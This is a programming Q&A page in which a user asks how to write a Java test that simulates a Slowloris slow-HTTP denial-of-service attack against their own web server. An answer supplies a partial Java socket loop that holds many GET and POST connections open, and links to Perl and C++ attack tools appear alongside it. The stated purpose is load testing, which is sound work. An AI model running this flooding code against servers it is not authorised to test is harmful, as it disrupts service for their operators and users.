I need to write java code test that will simulate Slowloris HTTP DoS attack on my web server. I've found a perl code that does that: http://ha.ckers.org/slowloris/
My environment is not constant, meaning i can't guarantee an active-perl installed on the machine. is there another way to do that? is there a way to use jerl (https://code.google.com/p/jerl/) to do that without an active-perl installation (maybe I can add the needed liberaries to my java project?)?
switch (dosMethod) {
case GET:
while(!StopWorking)
{
for(int i=0;i<per_Thread;i++)
{
if(socks[i].isConnected())
{
try
{
PrintWriter pw = new PrintWriter(socks[i].getOutputStream());
pw.println("GET / HTTP/1.1");
pw.println("Host: " + hp.getHostText());
pw.println();
pw.flush();
}
catch (Exception e){}
}
else
{
try {
socks[i] = new Socket(InetAddress.getByName(hp.getHostText()), hp.getPort());
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
break;
case POST:
for(int i=0;i<per_Thread;i++)
{
try {
socks[i].close();
} catch (IOException e) {
e.printStackTrace();
}
}
while(!StopWorking)
{
for(int i=0;i<per_Thread;i++)
{
if(socks[i].isConnected())
{
try {
PrintWriter pw = new PrintWriter(socks[i].getOutputStream());
pw.println();
} catch (IOException e) {
e.printStackTrace();
}
}
else
{
try {
socks[i] = new Socket(InetAddress.getByName(hp.getHostText()), hp.getPort());
PrintWriter pw = new PrintWriter(socks[i].getOutputStream());
pw.println("POST / HTTP/1.1");
pw.println("User-Agent: %s");
pw.println("Connection: keep-alive");
pw.println("Keep-Alive: 900");
pw.println("Content-Length: 10000");
pw.println("Content-Type: application/x-www-form-urlencoded");
pw.println();
pw.flush();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
break;
}
where socks is an Array of Sockets (Socket[] socks = new Socket[connsperthread];
you can use this implementation writen in c++ https://community.qualys.com/blogs/securitylabs/2011/08/25/new-open-source-tool-for-slow-http-attack-vulnerabilities
© 2022 - 2024 — McMap. All rights reserved.